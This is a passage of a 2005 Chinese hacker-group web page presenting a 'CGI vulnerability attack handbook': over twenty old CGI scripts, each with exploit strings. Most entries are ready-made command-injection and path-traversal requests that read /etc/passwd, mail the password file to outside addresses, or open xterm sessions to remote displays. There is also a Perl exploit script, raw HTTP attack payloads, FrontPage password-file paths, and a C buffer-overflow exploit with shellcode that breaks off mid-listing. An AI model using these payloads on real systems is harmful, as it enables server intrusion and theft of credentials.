CGI漏洞攻击手册version-0.02 || 中国X黑客小组


	您现在的位置：中国X黑客小组 >> 技术文章 >> 安全防御 >> 病毒分析 >> 文章正文	用户登录新用户注册

CGI漏洞攻击手册version-0.02

热 ★★★

【字体：小大】

CGI漏洞攻击手册version-0.02

作者：小许文章来源：NEEA0s Blog 点击数：更新时间：2005-5-15

前言

在论坛里看到过bamboo写的CGI漏洞利用的文章,我就想把他扩大一些.一直想完善一些再贴上来,但我并没有机会和时间试过所有漏洞,想到论坛里还有那么多同志会来完善的,就取名CGI漏洞攻击手册version-0.02(升级了bamboo的),旨在抛砖引玉,欢迎任意修改,增加...更欢迎任意散播.:)

一. phf漏洞
这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/etc/passwd:

lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

但是我们还能找到它吗?

二. php.cgi 2.0beta10或更早版本的漏洞
可以读nobody权限的所有文件.

lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd

php.cgi 2.1版本的只能读shtml文件了. 对于密码文件,同志们要注意一下,也许可能在/etc/master.passwd、/etc/security/passwd等.

三. whois_raw.cgi

lynx _raw.cgi?fqdn=%0Acat%20/etc/passwd">http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
lynx _raw.cgi?fqdn=%0A/usr/X11R6/bin/">http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/
xterm%20-display%20graziella.lame.org:0

四. faxsurvey

lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

五. textcounter.pl
如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行命令.

#!/usr/bin/perl
$URL='http://dtp.kappa.ro/a/test.shtml'; # please _DO_ _modify_ this
$EMAIL='pdoru@pop3.kappa.ro,root'; # please _DO_ _modify_ this
if ($ARGV[0]) { $CMD=$ARGV[0];}else{
$CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothere_one";
}$text="${URL}/;IFS=\8;${CMD};echo|";$text =~ s/ /\$\{IFS\}/g;#print "$text\n";
system({"wget"} "wget", $text, "-O/dev/null");
system({"wget"} "wget", $text, "-O/dev/null");
#system({"lynx"} "lynx", $text); #如果没有wget命令也可以用lynx
#system({"lynx"} "lynx", $text);

六. 一些版本(1.1)的info2www的漏洞
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami </etc/passwd|)'
$
You have new mail.
$

说实在我不太明白.:(

七. pfdispaly.cgi

lynx -source \
'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'

pfdisplay.cgi还有另外一个漏洞可以执行命令

lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
or
lynx -dump \
http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'

八. wrap

lynx http://www.victim.com/cgi-bin/wrap?/../../../../../etc

九. www-sql
可以让你读一些受限制的页面如:
在你的浏览器里输入:http://your.server/protected/something.html:
被要求输入帐号和口令.而有www-sql就不必了:

sql/protected/something.html">http://your.server/cgi-bin/www-sql/protected/something.html:

十. view-source

lynx http://www.victim.com/cgi-bin/view-source?../../../../../../../etc/passwd

十一.campas

lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a

十二.webgais

telnet www.victim.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit"line)
query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph

十三.websendmail

telnet www.victim.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the
string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a

十四.handler

telnet www.victim.com 80
GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=DownloadHTTP/1.0
or
GET /cgi-bin/handler/blah;xwsh -display yourhost.com|?data=Download
or
GET /cgi-bin/handler/<tab>;xterm<tab>-display<tab>danish:0<tab>-e<tab>/bin/sh|<tab>?data=Download

注意,cat后是TAB键而不是空格,服务器会报告不能打开useless_shit,但仍旧执行下面命令.

十五.test-cgi

lynx http://www.victim.com/cgi-bin/test-cgi?\whatever
CGI/1.0 test script report:

argc is 0. argv is .

SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = victim.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
得到一些http的目录

lynx http://www.victim.com/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
这招好象并不管用.:(
lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*
还可以这样试
GET /cgi-bin/test-cgi?* HTTP/1.0
GET /cgi-bin/test-cgi?x *
GET /cgi-bin/nph-test-cgi?* HTTP/1.0
GET /cgi-bin/nph-test-cgi?x *
GET /cgi-bin/test-cgi?x HTTP/1.0 *
GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *

十六.对于某些BSD的apache可以:

lynx http://www.victim.com/root/etc/passwd
lynx http://www.victim.com/~root/etc/passwd

十七.htmlscript

lynx http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd

十八.jj.c

The demo cgi program jj.c calls /bin/mail without filtering user
input, so any program based on jj.c could potentially be exploited by
simply adding a followed by a Unix command. It may require a
password, but two known passwords include HTTPdrocks and SDGROCKS. If
you can retrieve a copy of the compiled program running strings on it
will probably reveil the password.

Do a web search on jj.c to get a copy and study the code yourself if
you have more questions.

十九.Frontpage extensions
如果你读_vti_inf.html">http://www.victim.com/_vti_inf.html你将得到FP extensions的版本
和它在服务器上的路径. 还有一些密码文件如:

_vti_pvt/service.pwd">http://www.victim.com/_vti_pvt/service.pwd
_vti_pvt/users.pwd">http://www.victim.com/_vti_pvt/users.pwd
_vti_pvt/authors.pwd">http://www.victim.com/_vti_pvt/authors.pwd
_vti_pvt/administrators.pwd">http://www.victim.com/_vti_pvt/administrators.pwd

二十.Freestats.com CGI
没有碰到过,觉的有些地方不能搞错,所以直接贴英文.

John Carlton found following. He developed an exploit for the
free web stats services offered at freestats.com, and supplied the
webmaster with proper code to patch the bug.

Start an account with freestats.com, and log in. Click on the
area that says "CLICK HERE TO EDIT YOUR USER PROFILE & COUNTER
INFO" This will call up a file called edit.pl with your user #
and password included in it. Save this file to your hard disk and
open it with notepad. The only form of security in this is a
hidden attribute on the form element of your account number.
Change this from

*input type=hidden name=account value=your#*

to

*input type=text name=account value=""*

Save your page and load it into your browser. Their will now be a
text input box where the hidden element was before. Simply type a
# in and push the "click here to update user profile" and all the
information that appears on your screen has now been written to
that user profile.

But that isn't the worst of it. By using frames (2 frames, one to
hold this page you just made, and one as a target for the form
submission) you could change the password on all of their accounts
with a simple JavaScript function.

Deep inside the web site authors still have the good old "edit.pl"
script. It takes some time to reach it (unlike the path described)
but you can reach it directly at:

http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=

二十一.Vulnerability in Glimpse HTTP

telnet target.machine.com 80
GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor\@dhp.com\</etc/passwd;eval$CMD;echo
HTTP/1.0

二十二.Count.cgi
该程序只对Count.cgi 24以下版本有效：

/*### count.c ########################################################*/
#include <stdio.h>
#include <stdlib.h>
#include <getopt.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>

/* Forwards */
unsigned long getsp(int);
int usage(char *);
void doit(char *,long, char *);

/* Constants */
char shell[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d\x5e\x18\x88\x46\x2c\x88\x46\x30"
"\x88\x46\x39\x88\x46\x4b\x8d\x56\x20\x89\x16\x8d\x56\x2d\x89\x56"
"\x04\x8d\x56\x31\x89\x56\x08\x8d\x56\x3a\x89\x56\x0c\x8d\x56\x10"
"\x89\x46\x10\xb0\x0b\xcd\x80\x31\xdb\x89\xd8

[1] [2] 下一页

文章录入：IceRiver 责任编辑：IceRiver

上一篇文章： Win32/IRCBot.worm系列病毒变种及防治

下一篇文章：怎样彻底剿杀W32.Scard病毒

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				US CERT:谷歌eBay雅虎网站均 Epic Games Unreal有多个远程 shell编程例子 -- 一个.logi winlogin.exe - winlogin - acgenral - acgenral.dll - Safari漏洞太多苹果一周后即学习使用Nagios软件来监视远 WEBinsta FM文件管理系统 lo Cgogo获得信产部颁发移动搜索 Perl CGI 环境变量列表

　网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）


关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM